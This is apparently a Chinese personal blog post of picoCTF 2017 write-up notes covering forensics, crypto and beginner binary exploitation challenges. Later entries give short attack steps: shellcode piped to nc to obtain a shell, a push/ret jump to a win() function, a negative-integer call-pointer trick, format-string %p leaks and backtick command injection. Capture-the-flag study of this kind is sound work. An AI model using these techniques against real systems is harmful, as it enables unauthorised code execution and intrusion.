<h3 id="asmtosie-0"><a href="#asmtosie-0" class="headerlink" title="asmtosie 0"></a>asmtosie 0</h3><p><a href="https://godbolt.org/" target="_blank" rel="external">compiler explorer</a> </p>
<h3 id="arparparp"><a href="#arparparp" class="headerlink" title="arparparp"></a>arparparp</h3><p>打开流量包发现全是ARP和udp，然后传的数据都是各种len=1的，拼起来没看粗啥，发现mac地址不一样，有多个不同的MAC地址都声称ip地址192.168.2.10试图向192.168.2.9发送数据。找脚本~</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">#!/usr/bin/env python</div><div class="line"># File dumpUDP.py</div><div class="line">import scapy.all as scapy</div><div class="line">import sys</div><div class="line"></div><div class="line">pcap_file = sys.argv[1]</div><div class="line">mac = sys.argv[2]</div><div class="line"></div><div class="line">print(&apos;&apos;.join(</div><div class="line">    p[scapy.UDP].load</div><div class="line">        for p in scapy.PcapReader(pcap_file)</div><div class="line">        if p[scapy.Ether].src == mac and scapy.UDP in p</div><div class="line">    )</div><div class="line">)</div></pre></td></tr></table></figure>
<blockquote>
<p>sys.argv[0]-代码本身文件路径</p>
<p>sys.argv[1]-输入参数</p>
</blockquote>
<p>然后<code>sudo apt-get install python-scapy</code> 查了一下这个包好有用的样叽x</p>
<p>然后输入不同mac地址就出来这个发的数据了~</p>
<h3 id="CBC"><a href="#CBC" class="headerlink" title="CBC"></a>CBC</h3><p><a href="http://aes.online-domain-tools.com/" target="_blank" rel="external">在线解</a> </p>
<h3 id="Leaky"><a href="#Leaky" class="headerlink" title="Leaky"></a>Leaky</h3><p>format string attack(格式化字符串攻击):在printf函数中输%x却没有参数时，它会读取栈中的数据</p>
<p>常数值会按申明顺序编译进堆栈，所以看key上下两个数值间是啥就好了</p>
<h3 id="Two-Time-Pad"><a href="#Two-Time-Pad" class="headerlink" title="Two-Time Pad"></a>Two-Time Pad</h3><p>像素互相xor就好啦~每次用到py处理图像都是现场学x唉</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line">from PIL import Image</div><div class="line">from PIL import ImageFile</div><div class="line">ImageFile.LOAD_TRUNCATED_IMAGES = True</div><div class="line">img1=Image.open(&quot;/home/ringfall/Desktop/enc1.bmp&quot;)</div><div class="line">#img1.size()</div><div class="line">img_array1=img1.load()</div><div class="line">img2=Image.open(&quot;/home/ringfall/Desktop/enc2.bmp&quot;)</div><div class="line">img_array2=img2.load()</div><div class="line">img=Image.new(&quot;RGB&quot;,(600,100))</div><div class="line">for i in range(600):</div><div class="line">	for j in range(100):</div><div class="line">		a=img_array1[i,j][0]^img_array2[i,j][0]</div><div class="line">		b=img_array1[i,j][1]^img_array2[i,j][1]</div><div class="line">		c=img_array1[i,j][2]^img_array2[i,j][2]</div><div class="line">		img.putpixel((i,j),(a,b,c))</div><div class="line">img.save(&quot;/home/ringfall/Desktop/out.png&quot;)</div></pre></td></tr></table></figure>
<h3 id="core1"><a href="#core1" class="headerlink" title="core1"></a>core1</h3><p>使用gdb调试 <code>gdb core1.bin core1</code> (<code>gdb 可执行文件 coredump文件</code>)</p>
<p><a href="http://www.brendangregg.com/blog/2016-08-09/gdb-example-ncurses.html" target="_blank" rel="external">一个教程</a> / <a href="https://darkdust.net/files/GDB%20Cheat%20Sheet.pdf" target="_blank" rel="external">一个表</a> / 虽然看了还是不会就是了x</p>
<hr>
<p>做不动了。。。wp么没有。汪的哭了。换个玩玩QAQ</p>
<hr>
<h3 id="computeAES"><a href="#computeAES" class="headerlink" title="computeAES"></a>computeAES</h3><p>虽然有在线的可是base64解出来是乱码，只好上万能py</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">import base64</div><div class="line">from Crypto.Cipher import AES</div><div class="line"></div><div class="line">key = base64.b64decode(&quot;BmVWeKy6Qd+LEUXnG81SJQ==&quot;)</div><div class="line">ciphertext=base64.b64decode(&quot;0hxb++cNGw5/mPbBGzFzmREFL9waMmCuHK0DmkqXzRYXvj6+AqKvvhDwP5e1CS/w&quot;)</div><div class="line">crypter = AES.new(key, AES.MODE_ECB)</div><div class="line">plaintext = crypter.decrypt(ciphertext).decode(&quot;utf-8&quot;)</div><div class="line"></div><div class="line">print(plaintext)</div></pre></td></tr></table></figure>
<p>说米有Crypto，下了之后还是米有，搜粗来<code>sudo pip install pycrypto</code> ,虚拟机上可用</p>
<h3 id="leaf-of-the-forest"><a href="#leaf-of-the-forest" class="headerlink" title="leaf of the forest"></a>leaf of the forest</h3><p>linux下找文件<code>find . | grep flag</code> </p>
<h3 id="Hex2Raw"><a href="#Hex2Raw" class="headerlink" title="Hex2Raw"></a>Hex2Raw</h3><p>要输入给出16进制的原本字符，但系是不可见的所以要直接用py解码再输入</p>
<p> <code>python -c &quot;import base64; print(&#39;99d9835d83647dcf4cb202a51e1c29bc&#39;.decode(&#39;hex&#39;))&quot; | ./hex2raw</code> </p>
<h3 id="Raw2Hex"><a href="#Raw2Hex" class="headerlink" title="Raw2Hex"></a>Raw2Hex</h3><p>和上面相反~</p>
<p><code>./raw2hex | python -c &quot;flag=raw_input().split(&#39;:&#39;)[1]; print(flag.encode(&#39;hex&#39;))&quot;</code></p>
<h3 id="bashloop"><a href="#bashloop" class="headerlink" title="bashloop"></a>bashloop</h3><p><a href="https://ryanstutorials.net/bash-scripting-tutorial/bash-loops.php" target="_blank" rel="external">一个教程</a> bash看起来很好用的样叽鸭</p>
<p> 于是 <code>for i in {0..4096}; do ./bashloop $i | grep -v &quot;Nope.&quot;; done</code></p>
<p>grep -v 取反</p>
<h3 id="just-no"><a href="#just-no" class="headerlink" title="just no"></a>just no</h3><p>用相对路径读了flag，所以构造一个名字一样的假路径然后在这个路径下运行就会读这个路径下的auth了，因为相对路径是基于运行处而不是文件处的</p>
<hr>
<p>第一level过啦~不得不说pipo的剧情很有趣23333，可以说是非常hack了hhhh</p>
<h3 id="TW-GR-E1-ART"><a href="#TW-GR-E1-ART" class="headerlink" title="TW_GR_E1_ART"></a>TW_GR_E1_ART</h3><p>貌似是个游戏，然鹅打不开，就默默看看wp</p>
<ul>
<li>Node servers have a special file that lists dependencies and a start command: package.json</li>
</ul>
<p>然后根据各种相对路径等关系找鸭找就能找到flag产生函数和条件了</p>
<h3 id="Yarn"><a href="#Yarn" class="headerlink" title="Yarn"></a>Yarn</h3><blockquote>
<p>The default behavior of the Strings tool is to only print character sequences that are at least 4 characters long.However, if you want, you can change this limit using the -n command line option (which requires you to pass a number that signifies the new limit).</p>
<p>——from <a href="https://www.howtoforge.com/linux-strings-command/" target="_blank" rel="external">https://www.howtoforge.com/linux-strings-command/</a></p>
</blockquote>
<ul>
<li>strings命令默认输出4个字符以上的字符串，用-n 数字新限定</li>
</ul>
<h3 id="Mystery-Box"><a href="#Mystery-Box" class="headerlink" title="Mystery Box"></a>Mystery Box</h3><p>加密的方法真的是认都认不完呀</p>
<p><img src="https://webshell2017.picoctf.com/static/65c2504106ce38d8c2971ebaada542c7/MysteryBox.png" alt=""></p>
<p>找万能的<a href="http://enigma.louisedade.co.uk/enigma.html?m3;b;b123;ALOG;APPP;FH-GL" target="_blank" rel="external">online tool</a></p>
<h3 id="Little-School-Bus"><a href="#Little-School-Bus" class="headerlink" title="Little School Bus"></a>Little School Bus</h3><p>嗦了是lsb最低位，但是各种脚本各种报错。。mmp</p>
<p>于是发现一个神器——<a href="https://github.com/zed-0xff/zsteg" target="_blank" rel="external">zsteg</a> <code>git clone -&gt; gem install -&gt; 运行就好啦</code> </p>
<h3 id="Just-Keyp-Trying"><a href="#Just-Keyp-Trying" class="headerlink" title="Just Keyp Trying"></a>Just Keyp Trying</h3><p><code>tshark -r data.pcap -V | grep &quot;Leftover Capture Data&quot;</code> 然后对着手册解</p>
<p><a href="http://linux.51yip.com/search/tshark" target="_blank" rel="external">tshark</a> / <a href="http://linux.51yip.com/search/tcpdump" target="_blank" rel="external">tcpdump(处理更快,实时输出)</a></p>
<h3 id="SoRandom"><a href="#SoRandom" class="headerlink" title="SoRandom"></a>SoRandom</h3><p>作为一只数学渣渣和五秒记忆每次看脚本演算都要半天才搞懂逻辑QAQ结果好不容易写了个解密脚本怎么算都错？？？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">#!/usr/bin/python -u                                           </div><div class="line">import random,string                                           </div><div class="line">flag = &quot;BNZQ:jn0y1313td7975784y0361tp3xou1g44&quot;                      </div><div class="line">encflag = &quot;&quot;                                                   </div><div class="line">random.seed(&quot;random&quot;)                                          </div><div class="line">for c in flag:                                                 </div><div class="line">        if c.islower():                                        </div><div class="line">                encflag +=chr(ord(&apos;z&apos;)-(ord(&apos;z&apos;)-ord(c)+random.randrange(0,26))%26)   </div><div class="line">        elif c.isupper():                                      </div><div class="line">                encflag +=chr(ord(&apos;Z&apos;)-(ord(&apos;Z&apos;)-ord(c)+random.randrange(0,26))%26)  </div><div class="line">        elif c.isdigit():                                      </div><div class="line">                encflag +=chr(ord(&apos;9&apos;)-(ord(&apos;9&apos;)-ord(c)+random.randrange(0,10))%10)   </div><div class="line">        else: encflag += c                                     </div><div class="line">print &quot;Unguessably Randomized Flag: &quot;+encflag</div></pre></td></tr></table></figure>
<p>最后用别的wp的脚本试了也不行？？？然后发现它返回的字符串前面的<code>BNZQ:</code> 也算。。。好叭窝瞎x</p>
<h3 id="Shellz"><a href="#Shellz" class="headerlink" title="Shellz"></a>Shellz</h3><p>看着这程序极度怀疑自己没学过西加加（虽然这是C（也没学过汇编（虽然有好多种汇编（摔（爆哭</p>
<p>然后。。。恩完全不造咋做鸭</p>
<p>看了三个不一样的wp，居然都是从<a href="http://shell-storm.org/shellcode/" target="_blank" rel="external">这个网站</a>上找的shellcode？</p>
<p>好叭看了各种然后瞎几把分析，大概是 <code>void (*func)() = (void (*)())stuff;</code> 这句会给输入创建一个函数指针所以就能执行了？然后就去获得shell？</p>
<p><a href="http://shell-storm.org/shellcode/files/shellcode-841.php" target="_blank" rel="external">Tiny Execve sh Shellcode</a> / <a href="http://shell-storm.org/shellcode/files/shellcode-575.php" target="_blank" rel="external">execve /bin/sh</a> / <a href="http://shell-storm.org/shellcode/files/shellcode-811.php" target="_blank" rel="external">Linux x86 execve(“/bin/sh”)</a> 这些小于40bytes的都可以</p>
<p>保持输入后shell不断开：</p>
<p><code>python -c &quot;print(&#39;......&#39;)&quot; &gt; payload</code></p>
<p><code>cat payload - | nc  ......</code> 用那个小横线</p>
<h3 id="Shells"><a href="#Shells" class="headerlink" title="Shells"></a>Shells</h3><p>源代码里关键部分</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">//TODO: Ask IT why this is here</div><div class="line">void win()&#123;</div><div class="line">    system(&quot;/bin/cat ./flag.txt&quot;);    </div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>可以用GDB或者HexDump找到函数位置在0x08048540</p>
<p>payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">0:  68 40 85 04 08          push   0x8048540</div><div class="line">5:  c3                      ret</div></pre></td></tr></table></figure>
<p>可以直接16进制看也可以用<a href="https://github.com/radare/radare2" target="_blank" rel="external">radare2</a> 形成shellcode</p>
<p>最后 <code>python -c &quot;print(&#39;\x68\x40\x85\x04\x08\xC3&#39;)&quot; | nc .....</code></p>
<h3 id="Guess-The-Number"><a href="#Guess-The-Number" class="headerlink" title="Guess The Number"></a>Guess The Number</h3><p>源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div></pre></td><td class="code"><pre><div class="line">/* How well do you know your numbers? */</div><div class="line"></div><div class="line">#include &lt;stdio.h&gt;</div><div class="line">#include &lt;stdlib.h&gt;</div><div class="line">#include &lt;stdint.h&gt;</div><div class="line"></div><div class="line">void win(void) &#123;</div><div class="line">    printf(&quot;Congratulations! Have a shell:\n&quot;);</div><div class="line">    system(&quot;/bin/sh -i&quot;);</div><div class="line">&#125;</div><div class="line"></div><div class="line">int main(int argc, char **argv) &#123;</div><div class="line">    uintptr_t val;</div><div class="line">    char buf[32] = &quot;&quot;;</div><div class="line"></div><div class="line">    /* Turn off buffering so we can see output right away */</div><div class="line">    setbuf(stdout, NULL);</div><div class="line"></div><div class="line">    printf(&quot;Welcome to the number guessing game!\n&quot;);</div><div class="line">    printf(&quot;I&apos;m thinking of a number. Can you guess it?\n&quot;);</div><div class="line">    printf(&quot;Guess right and you get a shell!\n&quot;);</div><div class="line"></div><div class="line">    printf(&quot;Enter your number: &quot;);</div><div class="line">    scanf(&quot;%32s&quot;, buf);</div><div class="line">    val = strtol(buf, NULL, 10);</div><div class="line"></div><div class="line">    printf(&quot;You entered %d. Let&apos;s see if it was right...\n&quot;, val);</div><div class="line"></div><div class="line">    val &gt;&gt;= 4;</div><div class="line">    ((void (*)(void))val)();</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>很明显需要输入win()的地址左移四位得到的数<code>10000000010010000101001010110000</code> 但系超出了长度</p>
<p>提示 <code>strtol checks for overflow, but it does allow negative numbers</code> </p>
<blockquote>
<p>最高位如果为1代表为负数，求值的时候，需要先把二进制的值按位取反，然后加1得到负数绝对值(相反数)的二进制码，然后转为10进制，加上负号即可。</p>
</blockquote>
<p>绝对值 <code>1111111101101111010110101010000</code> 转为负数 <code>-2142743888</code> </p>
<h3 id="Ive-Got-A-Secret"><a href="#Ive-Got-A-Secret" class="headerlink" title="Ive Got A Secret"></a>Ive Got A Secret</h3><p>format string attack | 格式化字符串攻击</p>
<blockquote>
<p>如果程序员将攻击者控制的缓冲区作为参数传递给printf(或任何相关函数，包括sprintf、fprintf等)，攻击者可以对任意内存地址执行写操作。</p>
</blockquote>
<p>于是输入 <code>%p %p %p %p %p %p %p %p</code></p>
<p>返回的一个一个试就好啦</p>
<h3 id="题外话"><a href="#题外话" class="headerlink" title="题外话"></a>题外话</h3><p>一个有关shellcode艺术的集合？<a href="http://www.tldp.org/LDP/abs/html/index.html" target="_blank" rel="external">Advanced Bash-Scripting Guide</a> 看起来很棒</p>
<h3 id="Flagsay-1"><a href="#Flagsay-1" class="headerlink" title="Flagsay 1"></a>Flagsay 1</h3><p>使用 <code>`` or $()</code> bash命令执行就吼惹~</p>

        
    

    
</div>


                

                <!-- Post Comments -->
                
                    
                
            </div>

            <!-- Post Prev & Next Nav -->
            <nav class="material-nav mdl-color-text--grey-50 mdl-cell mdl-cell--12-col">
    <!-- Prev Nav -->
    
        <a href="/2018/09/16/nj/" id="post_nav-newer" class="prev-content">
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_back</i>
            </button>
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            新篇
        </a>
    

    <!-- Section Spacer -->
    <div class="section-spacer"></div>

    <!-- Next Nav -->
    
        <a href="/2018/08/11/ielts/" id="post_nav-older" class="next-content">
            旧篇
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_forward</i>
            </button>
        </a>
    
</nav>

        </div>
    </div>



                    
                        <!-- Overlay For Active Sidebar -->
<div class="sidebar-overlay"></div>

<!-- Material sidebar -->
<aside id="sidebar" class="sidebar sidebar-colored sidebar-fixed-left" role="navigation">
    <div id="sidebar-main">
        <!-- Sidebar Header -->
        <div class="sidebar-header header-cover" style="background-image: url(/img/5.jpg);">
    <!-- Top bar -->
    <div class="top-bar"></div>

    <!-- Sidebar toggle button -->
    <button type="button" class="sidebar-toggle mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon" style="display: initial;" data-upgraded=",MaterialButton,MaterialRipple">
        <i class="material-icons">clear_all</i>
        <span class="mdl-button__ripple-container">
            <span class="mdl-ripple">
            </span>
        </span>
    </button>

    <!-- Sidebar Avatar -->
    <div class="sidebar-image">
        <img src="/img/2.jpg" alt="铃落's avatar">
    </div>

    <!-- Sidebar Email -->
    <a data-toggle="dropdown" class="sidebar-brand" href="#settings-dropdown">
        ringfall3@gmail.com
        <b class="caret"></b>
    </a>
</div>


        <!-- Sidebar Navigation  -->
        <ul class="nav sidebar-nav">
    <!-- User dropdown  -->
    <li class="dropdown">
        <ul id="settings-dropdown" class="dropdown-menu">
            
                <li>
                    <a href="mailto: ringfall3@gmail.com" target="_blank" title="Email Me">
                        
                            <i class="material-icons sidebar-material-icons sidebar-indent-left1pc-element">email</i>
                        
                        Email Me
                    </a>
                </li>
            
        </ul>
    </li>

    <!-- Homepage -->
    
        <li id="sidebar-first-li">
            <a href="/">
                
                    <i class="material-icons sidebar-material-icons">home</i>
                
                主页
            </a>
        </li>
        
    

    <!-- Archives  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">inbox</i>
                
                    归档
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
            <li>
                <a class="sidebar_archives-link" href="/archives/2018/12/">十二月 2018<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/11/">十一月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/10/">十月 2018<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/09/">九月 2018<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/08/">八月 2018<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/07/">七月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/06/">六月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/05/">五月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/04/">四月 2018<span class="sidebar_archives-count">6</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/03/">三月 2018<span class="sidebar_archives-count">4</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/02/">二月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/01/">一月 2018<span class="sidebar_archives-count">3</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/12/">十二月 2017<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/10/">十月 2017<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/09/">九月 2017<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/08/">八月 2017<span class="sidebar_archives-count">4</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/07/">七月 2017<span class="sidebar_archives-count">4</span></a>
            </ul>
        </li>
        
    

    <!-- Categories  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">chrome_reader_mode</i>
                
                分类
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
                <li>
                <a class="sidebar_archives-link" href="/categories/Blog/">Blog<span class="sidebar_archives-count">14</span></a></li><li><a class="sidebar_archives-link" href="/categories/Diary/">Diary<span class="sidebar_archives-count">11</span></a>
            </ul>
        </li>
        
    

    <!-- Pages  -->
    
        <li>
            <a href="/timeline" title="timeline">
                
                    <i class="material-icons sidebar-material-icons">timeline</i>
                
                timeline
            </a>
        </li>
        
            <li class="divider"></li>
        
    
        <li>
            <a href="/gallery" title="miao">
                
                    <i class="material-icons sidebar-material-icons">palette</i>
                
                miao
            </a>
        </li>
        
    
        <li>
            <a href="/cv" title="cv">
                
                    <i class="material-icons sidebar-material-icons">person</i>
                
                cv
            </a>
        </li>
        
    

    <!-- Article Number  -->
    
</ul>


        <!-- Sidebar Footer -->
        <!--
I'm glad you use this theme, the development is no so easy, I hope you can keep the copyright, I will thank you so much.
If you still want to delete the copyrights, could you still retain the first one? Which namely "Theme Material"
It will not impact the appearance and can give developers a lot of support :)

很高兴您使用并喜欢该主题，开发不易 十分谢谢与希望您可以保留一下版权声明。
如果您仍然想删除的话 能否只保留第一项呢？即 "Theme Material"
它不会影响美观并可以给开发者很大的支持和动力。 :)
-->

<!-- Sidebar Divider -->


<!-- Theme Material -->


<!-- Help & Support -->
<!--

-->

<!-- Feedback -->
<!--

-->

<!-- About Theme -->
<!--

-->

    </div>

    <!-- Sidebar Image -->
    

</aside>

                    

                    
                        <!-- Footer Top Button -->
                        <div id="back-to-top" class="toTop-wrap">
    <a href="#top" class="toTop">
        <i class="material-icons footer_top-i">expand_less</i>
    </a>
</div>

                    

                    <!--Footer-->
<footer class="mdl-mini-footer" id="bottom">
    
        <!-- Paradox Footer Left Section -->
        <div class="mdl-mini-footer--left-section sns-list">
    <!-- Twitter -->
    
        <a href="https://twitter.com/twitter" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-twitter">
                <span class="visuallyhidden">Twitter</span>
            </button><!--
     --></a>
    

    <!-- Facebook -->
    
        <a href="https://www.facebook.com/facebook" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-facebook">
                <span class="visuallyhidden">Facebook</span>
            </button><!--
     --></a>
    

    <!-- Google + -->
    
        <a href="https://www.google.com/" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-gplus">
                <span class="visuallyhidden">Google Plus</span>
            </button><!--
     --></a>
    

    <!-- Weibo -->
    

    <!-- Instagram -->
    

    <!-- Tumblr -->
    

    <!-- Github -->
    

    <!-- LinkedIn -->
    

    <!-- Zhihu -->
    

    <!-- Bilibili -->
    

    <!-- Telegram -->
    

    <!-- V2EX -->
    

    <!-- Segmentfault -->
    
</div>


        <!--Copyright-->
        <div id="copyright">
            Copyright&nbsp;©&nbsp;<span year></span>&nbsp;RingFa1l
            
        </div>

        <!-- Paradox Footer Right Section -->

        <!--
        I am glad you use this theme, the development is no so easy, I hope you can keep the copyright.
        It will not impact the appearance and can give developers a lot of support :)

        很高兴您使用该主题，开发不易，希望您可以保留一下版权声明。
        它不会影响美观并可以给开发者很大的支持。 :)
        -->

        <div class="mdl-mini-footer--right-section">
            <div>
                <div class="footer-develop-div">Powered by <a href="https://hexo.io" target="_blank" class="footer-develop-a">Hexo</a></div>
                <div class="footer-develop-div">Theme - <a href="https://github.com/viosey/hexo-theme-material" target="_blank" class="footer-develop-a">Material</a></div>
            </div>
        </div>
    
</footer>


                    <!-- Import JS File -->

    <script>lsloader.load("lazyload_js","/js/lazyload.min.js?1BcfzuNXqV+ntF6gq+5X3Q==", true)</script>



    <script>lsloader.load("js_js","/js/js.min.js?Bn9UzEm8RrBSxqyZB0zPjA==", true)</script>



    <script>lsloader.load("np_js","/js/nprogress.js?pl3Qhb9lvqR1FlyLUna1Yw==", true)</script>


<script type="text/ls-javascript" id="NProgress-script">
    NProgress.configure({
        showSpinner: true
    });
    NProgress.start();
    $('#nprogress .bar').css({
        'background': '#29d'
    });
    $('#nprogress .peg').css({
        'box-shadow': '0 0 10px #29d, 0 0 15px #29d'
    });
    $('#nprogress .spinner-icon').css({
        'border-top-color': '#29d',
        'border-left-color': '#29d'
    });
    setTimeout(function() {
        NProgress.done();
        $('.fade').removeClass('out');
    }, 800);
</script>













<!-- UC Browser Compatible -->
<script>
	var agent = navigator.userAgent.toLowerCase();
	if(agent.indexOf('ucbrowser')>0) {
		document.write('<link rel="stylesheet" href="/css/uc.css">');
	   alert('由于 UC 浏览器使用极旧的内核，而本网站使用了一些新的特性。\n为了您能更好的浏览，推荐使用 Chrome 或 Firefox 浏览器。');
	}
</script>

<!-- Import prettify js  -->



<!-- Window Load -->
<!-- add class for prettify -->
<script type="text/ls-javascript" id="window-load">
    $(window).on('load', function() {
        // Post_Toc parent position fixed
        $('.post-toc-wrap').parent('.mdl-menu__container').css('position', 'fixed');
    });

    
    
</script>

<!-- MathJax Load-->


<!-- Bing Background -->


<script type="text/ls-javascript" id="lazy-load">
    // Offer LazyLoad
    queue.offer(function(){
        $('.lazy').lazyload({
            effect : 'show'
        });
    });

    // Start Queue
    $(document).ready(function(){
        setInterval(function(){
            queue.execNext();
        },200);
    });
</script>

<!-- Custom Footer -->



<script>
    var copyrightNow = new Date().getFullYear();
    var textContent = document.querySelector('span[year]')

    copyrightSince = 0000;
    if (copyrightSince === copyrightNow||copyrightSince === 0000) {
        textContent.textContent = copyrightNow
    } else {
        textContent.textContent = copyrightSince + ' - ' + copyrightNow
    }

    (function(){
        var scriptList = document.querySelectorAll('script[type="text/ls-javascript"]')

        for (var i = 0; i < scriptList.length; ++i) {
            var item = scriptList[i];
            lsloader.runInlineScript(item.id,item.id);
        }
    })()
console.log('\n %c © Material Theme | Version: 1.5.6 | https://github.com/viosey/hexo-theme-material %c \n', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-left-radius:5px;border-bottom-left-radius:5px;', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-right-radius:5px;border-bottom-right-radius:5px;');
</script>

                </main>
            </div>
        </body>
    
</html>
